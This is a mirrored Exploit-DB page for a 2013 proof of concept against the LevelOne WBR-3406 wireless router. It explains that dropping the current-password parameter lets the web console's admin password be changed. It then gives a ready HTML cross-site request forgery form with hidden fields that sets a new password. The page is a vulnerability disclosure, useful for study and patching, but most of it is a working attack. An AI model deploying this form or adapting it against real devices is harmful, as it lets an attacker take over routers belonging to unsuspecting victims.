WBR-3406 Wireless Broadband NAT Router – Web-Console Password Change Bypass / Cross-Site Request Forgery

  • 作者: Yakir Wizman
    日期: 2013-11-15
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/29612/
  • # -----------------------------------------------------------
    # WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability
    # This PoC code should do two main things:
    # 1. Cross Site Request Forgery (For more information, just google it).
    # 2. This code change to new password without know the current password.
    # The vulnerability work in a way that if we remove the "PA=" parameter which is the current password
    # the application ignore that and change the password without even entering the old / current password.
    # Bug discovered by Pr0T3cT10n AKA Yakir Wizman, <yakir.wizman@gmail.com>
    # Date 17/08/2012
    # Vendor site - http://www.level1.com/
    # ISRAEL
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    # Author will be not responsible for any damage.
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    		<form action="" method="POST">
    			<input type="hidden" name="rc" value="@" />
    			<input type="hidden" name="Pa" value="1234567" />
    			<input type="hidden" name="P1" value="1234567" />
    			<input type="hidden" name="rd" value="atbox" />
    			<input type="submit" value="Submit form" />
    # -----------------------------------------------------------